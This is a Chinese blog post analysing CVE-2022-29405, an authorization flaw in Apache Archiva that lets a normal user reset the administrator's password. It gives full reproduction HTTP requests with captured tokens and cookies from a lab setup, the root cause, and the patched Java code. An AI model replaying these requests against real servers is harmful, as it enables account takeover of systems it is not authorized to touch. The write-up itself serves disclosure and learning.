• CVE-2022-29405 Apache Archiva任意用户密码重置漏洞分析

    Apache Archiva是一套可扩展的Artifact Repository管理系统。它能够与Maven,Continuum和ANT等构建工具完美结合。Archiva提供的功能包括:远程Repository代理,基于角色的安全访问管理,Artifact分发、维护、查询,生成使用报告,提供基于Web的管理界面等。

    Apache Archiva 管理员创建的普通用户,其权限设置不当,导致普通用户可以修改任意用户信息。

    影响版本

    Apache Archiva 全版本(<=2.2.7)

    项目地址GitHub - apache/archiva: Apache Archiva Repository

    漏洞复现

    1,创建管理员账号 admin:admin123

    2,创建普通账号 user:user123 (勾选 validated)

    3,将编辑admin账号密码的包抓取下来

    POST /restServices/redbackServices/userService/updateUser HTTP/1.1
Host: 10.66.64.106:8080
Content-Length: 752
Accept: application/json, text/javascript, */*; q=0.01
X-XSRF-TOKEN: [替换值]
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.105 Safari/537.36
Content-Type: application/json
Origin: http://10.66.64.106:8080
Referer: http://10.66.64.106:8080/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: [替换值]
Connection: close
​
{"username":"admin","password":"admin123","confirmPassword":"admin123","fullName":"the administrator","email":"admin@admin.com","permanent":true,"validated":true,"timestampAccountCreation":"Mon, 1 Apr 2024 05:36:44 +0000 - 5 minutes ago","timestampLastLogin":null,"timestampLastPasswordChange":"Mon, 1 Apr 2024 05:36:44 +0000 - 5 minutes ago","locked":false,"passwordChangeRequired":false,"assignedRoles":["Global Repository Manager","Global Repository Observer","Repository Manager - internal","Repository Manager - snapshots","Repository Observer - internal","Repository Observer - snapshots","System Administrator","User Administrator"],"modified":true,"readOnly":false,"userManagerId":"jdo","rememberme":false,"validationToken":null,"logged":false}

    4,登录普通账号 替换值后发送上面抓取的包

     

    1. POST /restServices/redbackServices/userService/updateUser HTTP/1.1
    2. Host: 10.66.64.106:8080
    3. Content-Length: 750
    4. Accept: application/json, text/javascript, */*; q=0.01
    5. X-XSRF-TOKEN: I1ngx29RJKOGWU+mBxHVfK39m8LWeZpH3GGPmN/AVxHaaAa7+TUveJDvO48Z+KgQdclv7P8Zga9ZowMgEW0Q+Pm9q7kq2s0f7M0dUjrvNaislYP18IDjg18zey0jTvGlQlISdTOikY23gVn5+C5AZcJp5mxN3LsB6OWWpFweD4pBgJwUc1ij38n4w5nOUA0l4k8/Q3YoGDRvKL3mK5QTQVpCDt89dxXI0xpH+VYhLkdOTvJlE1WMXV8XN1Hev/Ipvr6XBlhl2tKRvnnWTD8GgxULnBdFdo6EQ4JBYYoWih8YCbSC6vIQCmyGQhkzulIDnCmqsiLH4s4c9Y6Uqeohnw==
    6. X-Requested-With: XMLHttpRequest
    7. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.105 Safari/537.36
    8. Content-Type: application/json
    9. Origin: http://10.66.64.106:8080
    10. Referer: http://10.66.64.106:8080/
    11. Accept-Encoding: gzip, deflate, br
    12. Accept-Language: zh-CN,zh;q=0.9
    13. Cookie: JSESSIONID=n2pfvjl209zinxflbferxloq; archiva_login=%7B%22username%22%3A%22user%22%2C%22password%22%3Anull%2C%22confirmPassword%22%3Anull%2C%22fullName%22%3A%22user123%22%2C%22email%22%3A%22user123%40user123.com%22%2C%22permanent%22%3Afalse%2C%22validated%22%3Atrue%2C%22timestampAccountCreation%22%3Anull%2C%22timestampLastLogin%22%3Anull%2C%22timestampLastPasswordChange%22%3Anull%2C%22locked%22%3Afalse%2C%22passwordChangeRequired%22%3Afalse%2C%22assignedRoles%22%3A%5B%5D%2C%22modified%22%3Afalse%2C%22readOnly%22%3Afalse%2C%22userManagerId%22%3Anull%2C%22rememberme%22%3Afalse%2C%22validationToken%22%3A%22I1ngx29RJKOGWU%2BmBxHVfK39m8LWeZpH3GGPmN%2FAVxHaaAa7%2BTUveJDvO48Z%2BKgQdclv7P8Zga9ZowMgEW0Q%2BPm9q7kq2s0f7M0dUjrvNaislYP18IDjg18zey0jTvGlQlISdTOikY23gVn5%2BC5AZcJp5mxN3LsB6OWWpFweD4pBgJwUc1ij38n4w5nOUA0l4k8%2FQ3YoGDRvKL3mK5QTQVpCDt89dxXI0xpH%2BVYhLkdOTvJlE1WMXV8XN1Hev%2FIpvr6XBlhl2tKRvnnWTD8GgxULnBdFdo6EQ4JBYYoWih8YCbSC6vIQCmyGQhkzulIDnCmqsiLH4s4c9Y6Uqeohnw%3D%3D%22%2C%22logged%22%3Afalse%7D
    14. Connection: close
    16. {"username":"admin","password":"user456","confirmPassword":"user456","fullName":"the administrator","email":"admin@admin.com","permanent":true,"validated":true,"timestampAccountCreation":"Mon, 1 Apr 2024 05:36:44 +0000 - 5 minutes ago","timestampLastLogin":null,"timestampLastPasswordChange":"Mon, 1 Apr 2024 05:36:44 +0000 - 5 minutes ago","locked":false,"passwordChangeRequired":false,"assignedRoles":["Global Repository Manager","Global Repository Observer","Repository Manager - internal","Repository Manager - snapshots","Repository Observer - internal","Repository Observer - snapshots","System Administrator","User Administrator"],"modified":true,"readOnly":false,"userManagerId":"jdo","rememberme":false,"validationToken":null,"logged":false}

    5, 使用修改后的密码 登录管理员账号

    现在查看 管理员账号admin 的密码是否被我们修改为了user456

    漏洞验证成功

    漏洞分析

    userService 中的updateUser 方法

     

    该方法 ,必须要有"user-management-user-edit"权限才能访问,然而我们普通也会有这个权限

    跟过去这个实现方法updateUser

    可以看到所有的参数均由前端传入, 可以造成越权.............

    后续修复

     

    1.  
    2. public Boolean updateUser(User user) throws RedbackServiceException {
    3.     RedbackRequestInformation redbackRequestInformation = RedbackAuthenticationThreadLocal.get();
    4.     if (redbackRequestInformation != null && redbackRequestInformation.getUser() != null) {
    5.         if (user == null) {
    6.             throw new RedbackServiceException(new ErrorMessage("user parameter is mandatory"), Status.BAD_REQUEST.getStatusCode());
    7.         } else if (!StringUtils.equals(redbackRequestInformation.getUser().getUsername(), user.getUsername()) && !StringUtils.equals(redbackRequestInformation.getUser().getUsername(), "admin")) {
    8.             throw new RedbackServiceException(new ErrorMessage("you can update only your profile"), Status.FORBIDDEN.getStatusCode());
    9.         } else {
    10.             try {
    11.                 org.apache.archiva.redback.users.User rawUser = this.userManager.findUser(user.getUsername(), false);
    12.                 rawUser.setFullName(user.getFullName());
    13.                 rawUser.setEmail(user.getEmail());
    14.                 rawUser.setValidated(user.isValidated());
    15.                 rawUser.setLocked(user.isLocked());
    16.                 rawUser.setPassword(user.getPassword());
    17.                 rawUser.setPasswordChangeRequired(user.isPasswordChangeRequired());
    18.                 rawUser.setPermanent(user.isPermanent());
    19.                 this.userManager.updateUser(rawUser);
    20.                 return Boolean.TRUE;
    21.             } catch (UserNotFoundException var4) {
    22.                 throw new RedbackServiceException(var4.getMessage());
    23.             } catch (UserManagerException var5) {
    24.                 throw new RedbackServiceException(new ErrorMessage(var5.getMessage()));
    25.             }
    26.         }
    27.     } else {
    28.         this.log.warn("RedbackRequestInformation from ThreadLocal is null");
    29.         throw new RedbackServiceException(new ErrorMessage("you must be logged to update your profile"), Status.FORBIDDEN.getStatusCode());
    30.     }
    31. }

    可以看到前端传入的Username做了再次的校验对比了redbackRequestInformation的username值

  • 相关阅读:
    ClamAV 部署
    基于Dockerfile制作镜像
    Java每日笔试题错题分析(1)
    JDK1.8新特性---新时间日期API
    最新版一媒体7.3、星媒体、皮皮剪辑,视频MD ,安卓手机剪辑去重神器+搬运脚本+去视频重软件工具
    高可用篇_A Docker容器化技术_I Docker基本概念
    kafka安装与相关配置详解
    【obs】NewSocketLoopEnable 网络优化
    Python之爬虫的头部伪装
    CV+Deep Learning——网络架构Pytorch复现系列——classification(三:MobileNet,ShuffleNet)
  • 原文地址:https://blog.csdn.net/shelter1234567/article/details/137235659